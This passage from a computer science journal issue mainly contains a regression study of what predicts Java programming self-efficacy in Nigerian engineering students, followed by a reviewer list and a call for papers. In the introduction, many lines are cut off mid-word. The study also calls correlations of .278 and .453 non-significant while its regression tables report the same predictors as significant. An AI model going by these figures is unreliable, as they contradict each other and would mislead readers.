[12] K. Deb, S. Agarwal, A. Pratap, and T. Meyarivan, "A fast and elitist multi-objective genetic algorithm: NSGA-II," IEEE Transactions on Evolutionary Computation, vol. 6, pp. 182-197, 2002.
[13] J. Liu, Z. Li, F. Liu, and Y. Chen, "Multi-Objective Particle Swarm Optimization Biclustering of Microarray Data," IEEE International Conference on Bioinformatics and Biomedicine, pp. 363-366, 2008.
[14] A. Ben-Dor, R. Shamir, and Z. Yakhini, "Clustering Gene Expression Patterns," J. Computational Biology, vol. 6, nos. 3-4, pp. 281-297, 1999.
[15] G. Getz, E. Levine, and E. Domany, "Coupled Two-Way Clustering Analysis of Gene Microarray Data," Proc. National Academy of Sciences USA, pp. 12079-12084, 2000.
AUTHOR'S PROFILE

Seyed Amirhassan Monadjemi was born in 1968 in Isfahan, Iran. He received his PhD in computer engineering, pattern recognition and image processing, from the University of Bristol, Bristol, England, in 2004. He is now working as a lecturer at the Department of Computer, University of Isfahan, Iran. His research interests include pattern recognition, image processing, human/machine analogy, and the physical detection and elimination of viruses.
PREDICTORS OF JAVA PROGRAMMING SELF–EFFICACY AMONG
ENGINEERING STUDENTS IN A NIGERIAN UNIVERSITY
By
Philip Olu Jegede, PhD
Institute of Education
Obafemi Awolowo University, Ile-Ife, Nigeria
ABSTRACT
The study examined the relationship between Java programming self-efficacy and the programming background of engineering students in a Nigerian university. One hundred and ninety-two final-year engineering students, randomly selected from six engineering departments of the university, participated in the study. Two research instruments, a Programming Background Questionnaire and a Java Programming Self-Efficacy Scale, were used in collecting relevant information from the subjects. The resulting data were analyzed using Pearson product-moment correlation and multiple regression analysis. Findings revealed that Java programming self-efficacy has no significant relationship with any single one of the computing and programming background factors. It was additionally found that the number of programming courses offered and the weighed scores in programming courses were the only predictors of Java self-efficacy.
INTRODUCTION
In a recent study, Askar and Davenport [1] identified variables that are related to self-efficacy of engineerin
students in Turkey, concluding with factors such as gender, computer experience, and family usage of computer
The importance of the study was based on the necessity of computer skills for today’s engineering profession
practices and the factors that would affect their ability to acquire programming skills. However literatures an
classroom experience have suggested other factors that may be associated or impact upon programming sel
efficacy. For example Romalingans, La Belle and Wiedenbeck [2] posited that programming self-efficacy is ofte
influenced by previous programming experience as well as mental modeling.
Bandura [3] posited that judgments of self-efficacy are based on four sources of information. The sources include
individual performance attainments, experiences of observing the performance of others, experiences of observin
the performance of others, verbal persuasion and psychological reactions that people use partly to judge the
capability. This is also applicable to programming domain. Performance attainment in this context can
measured by the scores of students in programming courses. In other words if students had persistently score
reasonably in previous programming courses, they tend to increase in their self efficacy. If research can identif
predicting factors of programming self-efficacy, the problem of poor performance in programming as well as th
of approach avoidance of programming in the future professional practice can be solved particularly amon
engineers of today as they are daily confronted with tasks that are computer and software driven. Studi
identifying discrete factors that are related to programming self efficacy are lacking in Nigeria. Identifying succe
criteria for computer programmers can help improve training and development programs in academic and industrial settings [4]. However, no study can investigate self-efficacy for all programming languages at a time. Thus this study starts with the Java programming language, one of the object-oriented languages recently introduced into the curricula of some engineering departments in Nigeria. Other object-oriented programming languages replacing the procedural ones in the old curricula include Matlab, C++ and C#. The goal of this work, therefore, is to study the Java self-efficacy of engineering students by exploring the relationship between Java self-efficacy and each of computing background, programming experience in years, weighed scores in programming courses, and number of programming courses taken. The study also seeks to investigate their combined influence on Java self-efficacy. Specifically, the study will answer the following questions:

1. What is the relationship between Java self-efficacy and each of computing background, programming experience, programming weighed scores and number of programming courses taken?
2. Will a combination of these selected factors significantly predict Java self-efficacy?
3. What is the proportion of variance in Java self-efficacy accounted for by the linear combination of the factors: computing experience, programming experience, programming weighed score and number of programming courses taken?
4. What is the relative contribution of each factor in the prediction of Java self-efficacy?
METHOD

One hundred and ninety-two final-year students who had taken programming, randomly selected from six engineering departments of Obafemi Awolowo University, Ile-Ife, Nigeria, participated in the study. These included the Mechanical, Civil, and Metallurgy and Materials Engineering departments; others included the Electrical, Chemical, and Computer Science and Engineering departments.

Two research instruments were employed to collect relevant data from the students: the Programming Background Questionnaire (PBQ) and the Java Programming Self-Efficacy Scale (JPSES). The PBQ was designed to obtain information on engineering students' programming experience, the number of programming courses previously undergone, and the scores obtained in those programming courses. The JPSES was developed by Askar and Davenport [1] from the computer programming self-efficacy scale of Ramalingam and Wiedenbeck [2].

Participants were to rate their confidence in performing some specified Java-programming-related tasks. The confidence was to be rated for each item on a seven-point Likert scale as follows: Not confident at all (1), Mostly not confident (2), Slightly confident (3), Averagely confident (4), Fairly confident (5), Mostly confident (6), Absolutely confident (7). The total score obtainable on the efficacy scale was 224, while the minimum score totaled 32. The instruments were administered to the students with the assistance of their lecturers. The resulting data were analyzed using Pearson product-moment correlation and multiple regression analysis.
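For readers who wish to reproduce this kind of analysis, the two statistics used here can be sketched as follows; this is an illustrative NumPy sketch, not the software actually used in the study:

```python
import numpy as np

def pearson_r(x, y):
    """Pearson product-moment correlation (as reported in Table 1)."""
    x, y = np.asarray(x, float), np.asarray(y, float)
    xc, yc = x - x.mean(), y - y.mean()
    return float((xc * yc).sum() / np.sqrt((xc ** 2).sum() * (yc ** 2).sum()))

def multiple_r2(X, y):
    """R-squared of an ordinary-least-squares fit of y on the predictor
    matrix X (intercept added), as summarized in Table 3."""
    y = np.asarray(y, float)
    X = np.column_stack([np.ones(len(y)), np.asarray(X, float)])
    beta, *_ = np.linalg.lstsq(X, y, rcond=None)
    resid = y - X @ beta
    return float(1.0 - (resid ** 2).sum() / ((y - y.mean()) ** 2).sum())
```

With the four background variables as the columns of X and the JPSES totals as y, multiple_r2 would yield the proportion of variance explained (the R² of Table 3).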
RESULTS
Table 1: Relationship between Java Self-Efficacy and Computing and Programming Background

                     Computing    Year of First   Weighed Score in      Number of Programming
                     Experience   Programming     Programming Courses   Courses Taken
Java Self-Efficacy   -.029        .099            .278                  .453
From Table 1, the correlation coefficients between Java programming self-efficacy and each of computing experience, year of first programming, weighed scores in programming courses, and number of programming courses taken were found to be r = -.029, .099, .278 and .453, respectively. The relationships were not significant at the .05 level of significance.
Table 2: Summary of Analysis of Variance of Programming Background and Java Programming Self-Efficacy

Source of Variance   Sum of Squares   df    Mean Square   F        Sig.
Regression           148157.887       4     37039.472     19.821   .000
Residual             351306.828       188   1868.653
Total                499464.715       192
Table 3: Summary of Multiple Regression Analysis of the Relationship between Java Programming Self-Efficacy and Programming Background

Variables entered: experience in computing, year of first programming, number of programming courses, average score

R      R Square   Adjusted R Square   Std. Error of the Estimate   Sig.
.545   .297       .282                43.22792                     .000
Table 4: Significance Tests of Regression Weights of Independent Variables

                              Unstandardized        Standardized
Model                         B         Std. Error  Beta     t        Sig.
(Constant)                    -80.003   24.752               -3.232   .001
Experience in computing       -4.758    3.530       -.085    -1.348   .179
Year of first programming     1.950     2.568       .047     .759     .449
Number of programming courses 26.548    3.530       .469     7.520    .000
Average score                 1.482     .337        .272     4.397    .000

a. Dependent Variable: Java self-efficacy
To verify whether a combination of the computing and programming related background variables would significantly predict Java self-efficacy, the data obtained from the programming background questionnaire and the Java self-efficacy scale were subjected to multiple regression analysis. Table 2 shows the summary of the analysis of variance of the independent variables in the regression procedure.

The results in Table 2 show that the analysis of variance of the multiple regression data yielded an F-ratio of 19.821, which is significant at the .05 level. This implies that a combination of the independent variables (i.e. computing experience, programming experience in years, number of programming courses taken and the average score in the programming courses) is significantly related to the Java self-efficacy of the engineering students.

The results of the regression analysis on the relationship between the dependent variable and the combination of the four independent variables are as stated in Table 3. The table shows that using the four independent variables (computing experience, year of first programming, number of programming courses and the average score in programming courses) to predict Java programming self-efficacy gives a coefficient of multiple regression (R) of .545 and a multiple correlation square (R²) of .297. These values are statistically significant at the .05 level, which suggests that only 29.7 percent of the variance of Java self-efficacy was explained by the combination of the four independent variables. A further attempt was made to determine the relative power of each of the independent variables to predict the Java self-efficacy of engineering students. Table 4 shows, for each of the variables, the standard error of estimate (SEB), Beta, t-ratio, and the level at which the t-ratio is significant.

From the table, the number of programming courses taken and the average score in programming courses taken have t-values of 7.520 and 4.397 respectively. The values of the Beta weights for the two variables are .469 and .272 respectively. These values are significant at the .05 level of confidence, which implies that the two variables contribute majorly to the prediction of Java self-efficacy. From the values of the Beta weights and t-ratios for each independent variable, it is clear that the number of programming courses offered had the highest impact in the prediction of Java
programming self-efficacy, followed by the average score of the programming courses offered. Year of first programming and experience in computing had t-values and Beta weights that are not significant at the .05 level. In summary, it could be said that the number of programming courses taken and the average score of programming courses offered by engineering students made significant contributions to the prediction of Java self-efficacy, while the weights of experience in computing and year of first programming demonstrated weak contributions.
DISCUSSION

The study found that the number of programming courses offered by students and their achievements in those programming courses (based on scores) significantly predict their Java programming self-efficacy. This appears consistent with the position of Wiedenbeck [5], who found that previous programming experience affected perceived self-efficacy on the one hand, and that perceived self-efficacy in programming also affected performance in programming courses.

In an earlier study, Ramalingam, LaBelle and Wiedenbeck [2] had come to the result that self-efficacy for programming was influenced by previous programming experience. Bandura [3] also opined that self-efficacy perceptions develop gradually with the attainment of skills and experience. The fact that self-efficacy in the programming domain becomes predictable by performance in programming courses is logical. This is because learners with high self-efficacy are more likely to undertake challenging tasks and to expend considerably greater effort to complete them in the face of unexpected difficulties than those with lower self-efficacy [1].

However, the number of years since a student had been introduced to programming did not significantly predict Java self-efficacy. This can be understood in this way: experience in programming measured in years may not necessarily imply continuous active programming experience. For example, many of the engineering students in the various departments used for the study took programming courses for the first time in their second year. The secondary school curriculum in Nigeria does not accommodate programming content, and it would be quite unlikely that students took the initiative to learn programming on their own before gaining admission into the university. Thus the subjects used for the study appear to have first experienced programming at approximately the same time. Apart from this, students might not get involved in programming except in the semester during which programming as a course was compulsory; hence years of programming experience did not predict Java self-efficacy. Similarly, years of computing experience did not predict Java self-efficacy; this is perhaps because the substantial part of the skills
acquired in the course of the students' encounters with computers were not in the programming domain. Rather, many of these skills were internet- and word-processing-related. This opposes the findings of Askar & Davenport [1], who posited that the number of years of experience a student had with computers made a significant linear contribution to their self-efficacy scores.

The findings above have pedagogical implications. Educational researchers recognize that because skills and self-efficacy are so intertwined, one way of improving student performance is to improve student self-efficacy [6]. Wiedenbeck et al. [6] believed that students must steadily carry out tasks of increasing difficulty, until they have a history of solid attainments. Expounding more on this idea, increasing performance through self-efficacy in programming courses will necessitate the following:

(i) More assignments at the beginning of programming courses than at the end of the semester. The assignments, given often, should move gradually from simple to complex. Observation has shown that instructors often wait till the end of the semester (i.e. close to the examination) before giving students assignments. But when assignments are given often at the beginning of the course, the confidence of students is boosted, particularly when the assignments are completed with success.

(ii) Prompt feedback must be ensured. Even when students undertake regular assignments, if their scores are not made known promptly, the reason(s) for the assignments become defeated. On the other hand, performance accomplishment becomes assured when students receive prompt feedback with successful scores, thereby leading to higher self-efficacy.

(iii) In the course of instructional lessons, group work in programming classes would help increase self-efficacy. This is because experiences of observing the performance of others give rise to self-efficacy, as posited by Bandura [3].
CONCLUSION

This study found that weighed scores in programming courses and the number of programming courses offered by engineering students were the significant predictors of Java programming self-efficacy. The study also found no significant relationship between Java programming self-efficacy and each of engineering students' computing background and year of first programming. Further studies are needed to identify factors that will better predict Java self-efficacy. In addition, the study needs to be replicated for other object-oriented languages currently introduced into the curriculum. A possible limitation of the study was that the scores obtained in programming courses did not derive from standardized tests; they were the proceeds of teacher-made tests, with their inherent weaknesses.

ACKNOWLEDGEMENT

The study acknowledges Askar & Davenport [1], whose work provided an instrument and inspiration for this effort.
REFERENCES

[1] Askar, P. & Davenport, D. (2009). An Investigation of Factors Related to Self-Efficacy for Java Programming Among Engineering Students. Turkish Online Journal of Educational Technology, 8(1).
[2] Ramalingam, V. & Wiedenbeck, S. (1998). Development and Validation of Scores on a Computer Programming Self-Efficacy Scale and Group Analyses of Novice Programmer Self-Efficacy. Journal of Educational Computing Research, 19(4), 367-386.
[3] Bandura, A. (1986). Social Foundations of Thought and Action: A Social Cognitive Theory. Prentice Hall, Englewood Cliffs, NJ.
[4] Sterling, G.D. & Brinthaupt, T.M. (2004). Faculty and Industry Conceptions of Successful Computer Programmers. Journal of Information Systems Education, 14(4).
[5] Wiedenbeck, S. (2005). Factors Affecting the Success of Non-Majors in Learning to Program. Proceedings of the First International Workshop on Computing Education Research, Seattle, 13-24.
[6] Wiedenbeck, S., LaBelle, D. & Kain, V.N.R. (2004). Factors Affecting Course Outcomes in Introductory Programming. Proceedings of the 16th Workshop of the Psychology of Programming Interest Group, Carlow, Ireland, 97-110.
AUTHOR'S PROFILE

Dr Philip Jegede is an Associate Professor in the Institute of Education of Obafemi Awolowo University, Ile-Ife, Nigeria. He holds both Bachelor and Master of Science degrees in Mathematics from the University of Lagos, Nigeria. He later ventured into the field of Education by enrolling for and completing a Master of Education and subsequently a PhD degree in Curriculum Studies with a focus on ICT. His research interest is in Computer Education. Before his present appointment, he had lectured in a College of Education and a Polytechnic.
IJCSIS REVIEWERS’ LIST
1. Dr. Lam Hong Lee, Universiti Tunku Abdul Rahman, Malaysia
2. Assoc. Prof. N. Jaisankar, VIT University, Vellore, Tamil Nadu, India
3. Dr. Amogh Kavimandan, The Mathworks Inc., USA
4. Dr. Ramasamy Mariappan, Vinayaka Missions University, India
5. Dr. Neeraj Kumar, SMVD University, Katra (J&K), India
6. Dr. Junjie Peng, Shanghai University, P. R. China
7. Dr. Ilhem LENGLIZ, HANA Group - CRISTAL Laboratory, Tunisia
8. Prof. Dr. Durgesh Kumar Mishra, Acropolis Institute of Technology and Research, Indore, MP, India
9. Prof. Dr. C. Suresh Gnana Dhas, Anna University, India
10. Prof. Pijush Biswas, RCC Institute of Information Technology, India
11. Dr. A. Arul Lawrence, Royal College of Engineering & Technology, India
12. Mr. Wongyos Keardsri, Chulalongkorn University, Bangkok, Thailand
13. Mr. Somesh Kumar Dewangan, CSVTU Bhilai (C.G.) / Dimat Raipur, India
14. Mr. Hayder N. Jasem, University Putra Malaysia, Malaysia
15. Mr. A.V.Senthil Kumar, C. M. S. College of Science and Commerce, India
16. Mr. R. S. Karthik, C. M. S. College of Science and Commerce, India
17. Mr. P. Vasant, University Technology Petronas, Malaysia
18. Mr. Wong Kok Seng, Soongsil University, Seoul, South Korea
19. Mr. Praveen Ranjan Srivastava, BITS PILANI, India
20. Mr. Kong Sang Kelvin, The Hong Kong Polytechnic University, Hong Kong
21. Mr. Mohd Nazri Ismail, Universiti Kuala Lumpur, Malaysia
22. Dr. Rami J. Matarneh, Al-isra Private University, Amman, Jordan
23. Dr Ojesanmi Olusegun Ayodeji, Ajayi Crowther University, Oyo, Nigeria
24. Dr. Siddhivinayak Kulkarni, University of Ballarat, Ballarat, Victoria, Australia
25. Dr. Riktesh Srivastava, Skyline University, UAE
26. Dr. Oras F. Baker, UCSI University - Kuala Lumpur, Malaysia
27. Dr. Ahmed S. Ghiduk, Faculty of Science, Beni-Suef University, Egypt
and Department of Computer science, Taif University, Saudi Arabia
28. Assist. Prof. Tirthankar Gayen, CIT, West Bengal University of Technology, India
29. Ms. Huei-Ru Tseng, National Chiao Tung University, Taiwan
30. Prof. Ning Xu, Wuhan University of Technology, China
31. Mr Mohammed Salem Binwahlan, Hadhramout University of Science and Technology, Yemen &
Universiti Teknologi Malaysia, Malaysia.
32. Dr. Aruna Ranganath, Bhoj Reddy Engineering College for Women, India
33. Mr. Hafeezullah Amin, Institute of Information Technology, KUST, Kohat, Pakistan
34. Prof. Syed S. Rizvi, University of Bridgeport, USA
35. Mr. Shahbaz Pervez Chattha, University of Engineering and Technology Taxila, Pakistan
36. Dr. Shishir Kumar, Jaypee University of Information Technology, Wakanaghat (HP), India
37. Mr. Shahid Mumtaz, Portugal Telecommunication, Instituto de Telecomunicações (IT), Aveiro
38. Mr. Rajesh K Shukla, Corporate Institute of Science & Technology Bhopal M P
39. Dr. Poonam Garg, Institute of Management Technology, India
40. Mr. S. Mehta, Inha University, Korea
41. Mr. Dilip Kumar S.M, University Visvesvaraya College of Engineering (UVCE), Bangalore University
42. Prof. Malik Sikander Hayat Khiyal, Fatima Jinnah Women University, Rawalpindi, Pakistan
43. Dr. Virendra Gomase, Department of Bioinformatics, Padmashree Dr. D.Y. Patil University
44. Dr. Irraivan Elamvazuthi, University Technology PETRONAS, Malaysia
45. Mr. Saqib Saeed, University of Siegen, Germany
46. Mr. Pavan Kumar Gorakavi, IPMA-USA [YC]
47. Dr. Ahmed Nabih Zaki Rashed, Menoufia University, Egypt
48. Prof. Shishir K. Shandilya, Rukmani Devi Institute of Science & Technology, India
49. Mrs. J. Komala Lakshmi, SNR Sons College, Computer Science, India
50. Mr. Muhammad Sohail, KUST, Pakistan
51. Dr. Manjaiah D.H, Mangalore University, India
52. Dr. S Santhosh Baboo, D.G.Vaishnav College, Chennai, India
53. Assist. Prof. Sugam Sharma, NIET, India / Iowa State University, USA
54. Jorge L. Hernández-Ardieta, University Carlos III of Madrid, Spain
55. Prof. Dr. Mokhtar Beldjehem, Sainte-Anne University, Halifax, NS, Canada
56. Dr. Deepak Laxmi Narasimha, VIT University, India
57. Prof. Dr. Arunkumar Thangavelu, Vellore Institute Of Technology, India
58. Mr. M. Azath, Anna University, India
59. Mr. Md. Rabiul Islam, Rajshahi University of Engineering & Technology (RUET), Bangladesh
60. Dr. Shimon K. Modi, Director of Research BSPA Labs, Purdue University, USA
61. Mr. Aos Alaa Zaidan Ansaef, Multimedia University, Malaysia
62. Dr Suresh Jain, Professor (on leave), Institute of Engineering & Technology, Devi Ahilya University,
Indore (MP) India,
63. Mr. Mohammed M. Kadhum, Universiti Utara Malaysia
64. Mr. Hanumanthappa. J. , University of Mysore, India
65. Mr. Syed Ishtiaque Ahmed, Bangladesh University of Engineering and Technology (BUET)
66. Mr Akinola Solomon Olalekan, University of Ibadan, Ibadan, Nigeria
67. Mr. Santosh K. Pandey, Department of Information Technology, The Institute of Chartered
Accountants of India
68. Dr. P. Vasant, Power Control Optimization, Malaysia
69. Dr. Petr Ivankov, Automatika - S, Russian Federation
70. Dr. Utkarsh Seetha, Data Infosys Limited, India
71. Mrs. Priti Maheshwary, Maulana Azad National Institute of Technology, Bhopal
72. Dr. (Mrs) Padmavathi Ganapathi, Avinashilingam University for Women, Coimbatore
73. Assist. Prof. A. Neela Madheswari, Anna University, India
74. Prof. Ganesan Ramachandra Rao, PSG College of Arts and Science, India
75. Mr. Kamanashis Biswas, Daffodil International University, Bangladesh
76. Dr. Atul Gonsai, Saurashtra University, Gujarat, India
77. Mr. Angkoon Phinyomark, Prince of Songkla University, Thailand
78. Mrs. G. Nalini Priya, Anna University, Chennai
CALL FOR PAPERS
International Journal of Computer Science and Information Security
IJCSIS 2009-2010
ISSN: 1947-5500
http://sites.google.com/site/ijcsis/
The International Journal of Computer Science and Information Security (IJCSIS), now at its fourth edition, is a premier scholarly venue in the areas of computer science and security issues. IJCSIS 2009-2010 will provide a high-profile, leading-edge platform for researchers and engineers alike to publish state-of-the-art research in the respective fields of information technology and communication security. The journal features a diverse mixture of articles covering core and applied computer science topics.

Authors are solicited to contribute to the special issue by submitting articles that illustrate research results, projects, survey works and industrial experiences describing significant advances in the following areas (the list is not exhaustive). Submissions may span a broad range of topics, e.g.:
Track A: Security
Access control, Anonymity, Audit and audit reduction & Authentication and authorization, Applied
cryptography, Cryptanalysis, Digital Signatures, Biometric security, Boundary control devices,
Certification and accreditation, Cross-layer design for security, Security & Network Management, Data and
system integrity, Database security, Defensive information warfare, Denial of service protection, Intrusion
Detection, Anti-malware, Distributed systems security, Electronic commerce, E-mail security, Spam,
Phishing, E-mail fraud, Virus, worms, Trojan Protection, Grid security, Information hiding and
watermarking & Information survivability, Insider threat protection, Integrity,
Intellectual property protection, Internet/Intranet Security, Key management and key recovery,
Language-based security, Mobile and wireless security, Mobile, Ad Hoc and Sensor Network Security, Monitoring
and surveillance, Multimedia security, Operating system security, Peer-to-peer security, Performance
Evaluations of Protocols & Security Application, Privacy and data protection, Product evaluation criteria
and compliance, Risk evaluation and security certification, Risk/vulnerability assessment, Security & Network Management, Security Models & protocols, Security threats & countermeasures (DDoS, MiM,
Session Hijacking, Replay attack, etc.), Trusted computing, Ubiquitous Computing Security, Virtualization
security, VoIP security, Web 2.0 security, Submission Procedures, Active Defense Systems, Adaptive
Defense Systems, Benchmark, Analysis and Evaluation of Security Systems, Distributed Access Control
and Trust Management, Distributed Attack Systems and Mechanisms, Distributed Intrusion
Detection/Prevention Systems, Denial-of-Service Attacks and Countermeasures, High Performance
Security Systems, Identity Management and Authentication, Implementation, Deployment and
Management of Security Systems, Intelligent Defense Systems, Internet and Network Forensics, Large-
scale Attacks and Defense, RFID Security and Privacy, Security Architectures in Distributed Network
Systems, Security for Critical Infrastructures, Security for P2P systems and Grid Systems, Security in E-
Commerce, Security and Privacy in Wireless Networks, Secure Mobile Agents and Mobile Code, Security
Protocols, Security Simulation and Tools, Security Theory and Tools, Standards and Assurance Methods,
Trusted Computing, Viruses, Worms, and Other Malicious Code, World Wide Web Security, Novel and emerging secure architecture, Study of attack strategies, attack modeling, Case studies and analysis of
actual attacks, Continuity of Operations during an attack, Key management, Trust management, Intrusion
detection techniques, Intrusion response, alarm management, and correlation analysis, Study of tradeoffs
between security and system performance, Intrusion tolerance systems, Secure protocols, Security in
wireless networks (e.g. mesh networks, sensor networks, etc.), Cryptography and Secure Communications,
Computer Forensics, Recovery and Healing, Security Visualization, Formal Methods in Security, Principles
for Designing a Secure Computing System, Autonomic Security, Internet Security, Security in Health Care
Systems, Security Solutions Using Reconfigurable Computing, Adaptive and Intelligent Defense Systems,
Authentication and Access control, Denial of service attacks and countermeasures, Identity, Route and
Location Anonymity schemes, Intrusion detection and prevention techniques, Cryptography, encryption
algorithms and Key management schemes, Secure routing schemes, Secure neighbor discovery and
localization, Trust establishment and maintenance, Confidentiality and data integrity, Security architectures,
deployments and solutions, Emerging threats to cloud-based services, Security model for new services,
Cloud-aware web service security, Information hiding in Cloud Computing, Securing distributed data
storage in cloud, Security, privacy and trust in mobile computing systems and applications, Middleware
security & security features: middleware software is an asset on its own and has to be protected; interaction between security-specific and other middleware features, e.g.,
context-awareness, Middleware-level security monitoring and measurement: metrics and mechanisms
for quantification and evaluation of security enforced by the middleware, Security co-design: trade-off and
co-design between application-based and middleware-based security, Policy-based management:
innovative support for policy-based definition and enforcement of security concerns, Identification and
authentication mechanisms: Means to capture application specific constraints in defining and enforcing
access control rules, Middleware-oriented security patterns: identification of patterns for sound, reusable
security, Security in aspect-based middleware: mechanisms for isolating and enforcing security aspects,
Security in agent-based platforms: protection for mobile code and platforms, Smart Devices: Biometrics,
National ID cards, Embedded Systems Security and TPMs, RFID Systems Security, Smart Card Security,
Pervasive Systems: Digital Rights Management (DRM) in pervasive environments, Intrusion Detection and
Information Filtering, Localization Systems Security (Tracking of People and Goods), Mobile Commerce
Security, Privacy Enhancing Technologies, Security Protocols (for Identification and Authentication,
Confidentiality and Privacy, and Integrity), Ubiquitous Networks: Ad Hoc Networks Security, Delay-Tolerant Network Security, Domestic Network Security, Peer-to-Peer Networks Security, Security Issues
in Mobile and Ubiquitous Networks, Security of GSM/GPRS/UMTS Systems, Sensor Networks Security,
Vehicular Network Security, Wireless Communication Security: Bluetooth, NFC, WiFi, WiMAX,
WiMedia, others
This Track will emphasize the design, implementation, management and applications of computer
communications, networks and services. Topics of a mostly theoretical nature are also welcome, provided
there is clear practical potential in applying the results of such work.
Track B: Computer Science
Broadband wireless technologies: LTE, WiMAX, WiRAN, HSDPA, HSUPA, Resource allocation and interference management, Quality of service and scheduling methods, Capacity planning and dimensioning,
Cross-layer design and Physical layer based issue, Interworking architecture and interoperability, Relay
assisted and cooperative communications, Location and provisioning and mobility management, Call
admission and flow/congestion control, Performance optimization, Channel capacity modeling and analysis,
Middleware Issues: Event-based, publish/subscribe, and message-oriented middleware, Reconfigurable,
adaptable, and reflective middleware approaches, Middleware solutions for reliability, fault tolerance, and
quality-of-service, Scalability of middleware, Context-aware middleware, Autonomic and self-managing
middleware, Evaluation techniques for middleware solutions, Formal methods and tools for designing,
verifying, and evaluating, middleware, Software engineering techniques for middleware, Service oriented
middleware, Agent-based middleware, Security middleware, Network Applications: Network-based
automation, Cloud applications, Ubiquitous and pervasive applications, Collaborative applications, RFID
and sensor network applications, Mobile applications, Smart home applications, Infrastructure monitoring
and control applications, Remote health monitoring, GPS and location-based applications, Networked vehicle applications, Alert applications, Embedded Computer Systems, Advanced Control Systems, and
Intelligent Control : Advanced control and measurement, computer and microprocessor-based control,
signal processing, estimation and identification techniques, application-specific ICs, nonlinear and
adaptive control, optimal and robust control, intelligent control, evolutionary computing, and intelligent
systems, instrumentation subject to critical conditions, automotive, marine and aero-space control and all
other control applications, Intelligent Control System, Wiring/Wireless Sensor, Signal Control System.
Sensors, Actuators and Systems Integration : Intelligent sensors and actuators, multisensor fusion, sensor
array and multi-channel processing, micro/nano technology, microsensors and microactuators,
instrumentation electronics, MEMS and system integration, wireless sensor, Network Sensor, Hybrid
Sensor, Distributed Sensor Networks. Signal and Image Processing : Digital signal processing theory,
methods, DSP implementation, speech processing, image and multidimensional signal processing, Image
analysis and processing, Image and Multimedia applications, Real-time multimedia signal processing,
Computer vision, Emerging signal processing areas, Remote Sensing, Signal processing in education.
Industrial Informatics: Industrial applications of neural networks, fuzzy algorithms, Neuro-Fuzzy
application, bioinformatics, real-time computer control, real-time information systems, human-machine
interfaces, CAD/CAM/CAT/CIM, virtual reality, industrial communications, flexible manufacturing
systems, industrial automated process, Data Storage Management, Hard disk control, Supply Chain
Management, Logistics applications, Power plant automation, Drives automation. Information Technology,
Management of Information System : Management information systems, Information Management,
Nursing information management, Information System, Information Technology and their application, Data
retrieval, Data Base Management, Decision analysis methods, Information processing, Operations research,
E-Business, E-Commerce, E-Government, Computer Business, Security and risk management, Medical
imaging, Biotechnology, Bio-Medicine, Computer-based information systems in health care, Changing
Access to Patient Information, Healthcare Management Information Technology.
Communication/Computer Network, Transportation Application : On-board diagnostics, Active safety
systems, Communication systems, Wireless technology, Communication application, Navigation and
Guidance, Vision-based applications, Speech interface, Sensor fusion, Networking theory and technologies,
Transportation information, Autonomous vehicle, Vehicle application of affective computing, Advance
Computing technology and their application : Broadband and intelligent networks, Data Mining, Data
fusion, Computational intelligence, Information and data security, Information indexing and retrieval,Information processing, Information systems and applications, Internet applications and performances,
Knowledge based systems, Knowledge management, Software Engineering, Decision making, Mobile
networks and services, Network management and services, Neural Network, Fuzzy logics, Neuro-Fuzzy,
Expert approaches, Innovation Technology and Management : Innovation and product development,
Emerging advances in business and its applications, Creativity in Internet management and retailing, B2B
and B2C management, Electronic transceiver device for Retail Marketing Industries, Facilities planning
and management, Innovative pervasive computing applications, Programming paradigms for pervasive
systems, Software evolution and maintenance in pervasive systems, Middleware services and agent
technologies, Adaptive, autonomic and context-aware computing, Mobile/Wireless computing systems and
services in pervasive computing, Energy-efficient and green pervasive computing, Communication
architectures for pervasive computing, Ad hoc networks for pervasive communications, Pervasive
opportunistic communications and applications, Enabling technologies for pervasive systems (e.g., wireless
BAN, PAN), Positioning and tracking technologies, Sensors and RFID in pervasive systems, Multimodalsensing and context for pervasive applications, Pervasive sensing, perception and semantic interpretation,
Smart devices and intelligent environments, Trust, security and privacy issues in pervasive systems, User
interfaces and interaction models, Virtual immersive communications, Wearable computers, Standards and
interfaces for pervasive computing environments, Social and economic models for pervasive systems,
Active and Programmable Networks, Ad Hoc & Sensor Network, Congestion and/or Flow Control, Content
Distribution, Grid Networking, High-speed Network Architectures, Internet Services and Applications,
Optical Networks, Mobile and Wireless Networks, Network Modeling and Simulation, Multicast,
Multimedia Communications, Network Control and Management, Network Protocols, Network
Performance, Network Measurement, Peer to Peer and Overlay Networks, Quality of Service and Quality
of Experience, Ubiquitous Networks, Crosscutting Themes – Internet Technologies, Infrastructure,
Services and Applications; Open Source Tools, Open Models and Architectures; Security, Privacy and
Trust; Navigation Systems, Location Based Services; Social Networks and Online Communities; ICT
Convergence, Digital Economy and Digital Divide, Neural Networks, Pattern Recognition, Computer Vision, Advanced Computing Architectures and New Programming Models, Visualization and Virtual
Reality as Applied to Computational Science, Computer Architecture and Embedded Systems, Technology
in Education, Theoretical Computer Science, Computing Ethics, Computing Practices & Applications
Authors are invited to submit papers by e-mail to ijcsiseditor@gmail.com. Submissions must be original
and must not have been published previously or be under consideration for publication elsewhere while being
evaluated by IJCSIS. Before submission, authors should carefully read the journal's Author Guidelines,
located at http://sites.google.com/site/ijcsis/authors-notes.